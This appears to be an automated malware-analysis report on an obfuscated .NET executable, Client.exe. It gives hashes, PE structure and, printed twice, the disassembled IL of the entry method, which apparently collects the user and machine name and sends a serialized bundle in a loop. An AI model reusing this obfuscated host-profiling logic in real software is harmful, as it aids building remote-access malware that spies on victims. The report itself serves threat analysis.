Suspicious
Suspect

456f2588e7790fb14fb0fd0ae9f0ac3c

PE Executable
|
MD5: 456f2588e7790fb14fb0fd0ae9f0ac3c
|
Size: 326.66 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
456f2588e7790fb14fb0fd0ae9f0ac3c
Sha1
aead464ad6f544d4460d08edfa992719c67077bc
Sha256
3c5a05002285a08e318b47a50023a8a784c94333a423d73d12178391624f395b
Sha384
0983dd2e2cc06031520f83e3ea0338c04de4ab54d47ff58a0f6211816d9eb266cb895f168d902769de31196619eabe11
Sha512
23c46901b1145ee040c8c4b418e8c69dee2281221456ffe462156ea8b0d0913ed94c1ca3ee87771799dc80aa463837b20d6989ed771a8e30985acd3c8e575145
SSDeep
6144:afKjtV1n+geKyiVdePt38rueUmg6fxKYskqbxPf5xP:EOtV1nzyYgI8YCP
TLSH
746484257FA58E10D481287ECA7F3609CB16E0F125026347370AFAA15D05ADEEE6D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yxz5h0
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

455

Main Method

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TWryEESvWJpaI() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LIducvdXgOOkIlwda() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::qezRvPIhPfDcXWNqkCoTgxh() stloc V_3 nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pcjUvhysjwjdYuMNlvfxUErs() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() br IL_000E: nop call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() call System.Void TvoOCZGzbqwmHIV.qlonCRfSGqhxQXThrtCHmlGi::WvaMUZbtwDjQWZnycoQ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::kiDZEwunFmylAy call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::IQHvlaMayVxTvOzenyOjDyO() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Void rExlEpgfMJQln.HsTkcRLdzLyVXkUpiF::uuleILxWyGlUdKqmpDvyWjBE() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Boolean aHXcrjnXXJpLxIfl.OjRjFrHCdbtKqXnQubazHdX::bNRgiXZoMnmlRUkSvFqcRaUI(System.String) brtrue IL_0080: call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() leave IL_0283: ret call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() call System.Void vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::sHlWnhuIKmdU() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brtrue IL_026E: call System.Int32 
YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::ktETYFCFkTUyR call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::SAtpGMswDbSfomihK() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::bmjRqqahkSkbklrxcgEDcjq() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::USuixIxQKLQFnAKDOYba() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::crhoqJCcGQrvC() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvskcUURZVlKbWApEIQUsbNtG() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vnDuYJkElHWnzFsLRLCgifbRM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fiExiyedZhNfwcZXksSQ() ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::KcgJBqZQPLlh() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::eCzoZXJWfKxmOaHKuizwaU() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::XngHEMKVcxH() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::lowYAvvCHc() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::WXwTuGmfRiXnPSGUcmlOJwcBs() ldelem System.String ldloc 
V_2 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::jMMXakFvHMoSB(System.String,System.String) ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brfalse IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::KLVTBNewKFxyn ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::hylDTFqgQkPoXTrd ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::FJVpVoHckmyPEp() newarr System.Object dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pooPtslGpspMsoZvubeAcJ() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::CIEohmYOShKbcPatVKoycrPc() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::NjgmiTVNhvaUInmyXU() call System.Byte[] 
vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::ZwlxNhRXKFPsYXNTbFhkpN() stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::gwfbOoKqEnZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MHFgjQDvjHQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LfMbfNFDnTfIRRURIIdGgZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::vMpLGColhMOLGxjkKapl stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fhHRyXcRaIGPowMGkSQ() call System.String System.Environment::get_UserName() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::hVjXBoKBNtdVYt() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::MRXKwUtiwKSImBg() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::amwUKZkrwAQTryMdllovMLCv stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvHfKCFzKCfUwBsoQIROKwUd() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::nWYDggJrFlslEjcntgFyNUZQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::tVPpycmPSioLlFJMXAu() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MYlJhPkAZWCMn stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YmuSesdkSjbbdBRhpJMasF() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fWZBOknCrDEFvvL stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TDcfDHCmwapFHbxLFyC() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::THclMTshBLISew stelem.ref <null> dup 
<null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::jGNijocWOnTwTIaOBNacQxeA() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::OiDxEkQOfHLKsedFKiJ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vJFsyGbqIuNpuvPefYJGtm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fJlVinJWUKUaHpWXlLdioTBWb stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::AiKsYZfmbNuneXePgsFKNNZGR() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::uUUuUGZlPDEqXOfPNCulzHMM stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::ylYVtvJJFJnND() call System.String vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::PiaoimYhGFUbxzEuskhngWJC() stelem.ref <null> call System.Byte[] GdRRjytEVi.kUdaaiUbrNX::ByinMbDWLTjKqGAQUy(System.Object[]) callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::fmyQajTAEfcWbdwPOAPg(System.Byte[]) call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt pop <null> leave IL_0283: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

455

Main Method

System.Void TvoOCZGzbqwmHIV.uWcEvowkVqNm::glcitteaxAkFI(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TWryEESvWJpaI() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LIducvdXgOOkIlwda() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::qezRvPIhPfDcXWNqkCoTgxh() stloc V_3 nop <null> ldloc V_3 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pcjUvhysjwjdYuMNlvfxUErs() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() br IL_000E: nop call System.Void YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::hivgmmgCNSkl() call System.Void TvoOCZGzbqwmHIV.qlonCRfSGqhxQXThrtCHmlGi::WvaMUZbtwDjQWZnycoQ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::kiDZEwunFmylAy call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::IQHvlaMayVxTvOzenyOjDyO() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Void rExlEpgfMJQln.HsTkcRLdzLyVXkUpiF::uuleILxWyGlUdKqmpDvyWjBE() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MXApoRXEGoKwCurUCm call System.Boolean aHXcrjnXXJpLxIfl.OjRjFrHCdbtKqXnQubazHdX::bNRgiXZoMnmlRUkSvFqcRaUI(System.String) brtrue IL_0080: call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() leave IL_0283: ret call System.Void sapKTbbvITiQsY.zTSHubKGHyCNL::kXEjoatcckXZkgyzAFanOovs() call System.Void vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::sHlWnhuIKmdU() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brtrue IL_026E: call System.Int32 
YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::ktETYFCFkTUyR call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::SAtpGMswDbSfomihK() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::bmjRqqahkSkbklrxcgEDcjq() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::USuixIxQKLQFnAKDOYba() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::crhoqJCcGQrvC() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvskcUURZVlKbWApEIQUsbNtG() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vnDuYJkElHWnzFsLRLCgifbRM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fiExiyedZhNfwcZXksSQ() ldelem System.String call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::KcgJBqZQPLlh() newarr System.Char dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::eCzoZXJWfKxmOaHKuizwaU() call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::XngHEMKVcxH() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::lowYAvvCHc() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldloc V_1 call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::WXwTuGmfRiXnPSGUcmlOJwcBs() ldelem System.String ldloc 
V_2 ldsfld System.Random vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::OEJcHcYJmiJ ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::jMMXakFvHMoSB(System.String,System.String) ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldfld System.Boolean TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::satInemMqqtSY brfalse IL_026E: call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld qEMLwxnfmKJ.PjLqCDtlVPlZaCioDBAEY TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::KLVTBNewKFxyn ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt newobj System.Void rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS::.ctor(TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz) stfld rExlEpgfMJQln.oxkBfCwlMyfCMNEHzSdukS TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::hylDTFqgQkPoXTrd ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::FJVpVoHckmyPEp() newarr System.Object dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::pooPtslGpspMsoZvubeAcJ() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::CIEohmYOShKbcPatVKoycrPc() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::NjgmiTVNhvaUInmyXU() call System.Byte[] 
vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::ZwlxNhRXKFPsYXNTbFhkpN() stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::gwfbOoKqEnZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MHFgjQDvjHQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::LfMbfNFDnTfIRRURIIdGgZ() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::vMpLGColhMOLGxjkKapl stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::fhHRyXcRaIGPowMGkSQ() call System.String System.Environment::get_UserName() call System.String YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::hVjXBoKBNtdVYt() call System.String sapKTbbvITiQsY.WAIwXPaajmNWWowCbkFtSbU::fSNWAbnCqhBTRJvWZOYHp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::MRXKwUtiwKSImBg() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::amwUKZkrwAQTryMdllovMLCv stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YvHfKCFzKCfUwBsoQIROKwUd() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::nWYDggJrFlslEjcntgFyNUZQ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::tVPpycmPSioLlFJMXAu() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::MYlJhPkAZWCMn stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::YmuSesdkSjbbdBRhpJMasF() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fWZBOknCrDEFvvL stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::TDcfDHCmwapFHbxLFyC() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::THclMTshBLISew stelem.ref <null> dup 
<null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::jGNijocWOnTwTIaOBNacQxeA() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::OiDxEkQOfHLKsedFKiJ stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::vJFsyGbqIuNpuvPefYJGtm() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::fJlVinJWUKUaHpWXlLdioTBWb stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::AiKsYZfmbNuneXePgsFKNNZGR() ldsfld System.String YzxpulDNmWJvDGgpfIFPwQ.CpkSBpHThBJTHcBFKOaCDjz::uUUuUGZlPDEqXOfPNCulzHMM stelem.ref <null> dup <null> call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::ylYVtvJJFJnND() call System.String vwEMjJqGRGLiyVf.SVcHGGTlhgiDy::PiaoimYhGFUbxzEuskhngWJC() stelem.ref <null> call System.Byte[] GdRRjytEVi.kUdaaiUbrNX::ByinMbDWLTjKqGAQUy(System.Object[]) callvirt System.Void TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz::fmyQajTAEfcWbdwPOAPg(System.Byte[]) call System.Int32 YzxpulDNmWJvDGgpfIFPwQ.fkiNWicySxpfNSpXmITOcBn::cIlcAHkHBIcOnbm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld TvoOCZGzbqwmHIV.kNTWnNXAuFBrJJqbvDz TvoOCZGzbqwmHIV.uWcEvowkVqNm::NrqKByFsksahKEwhfUTlqGt pop <null> leave IL_0283: ret ret <null>

456f2588e7790fb14fb0fd0ae9f0ac3c (326.66 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
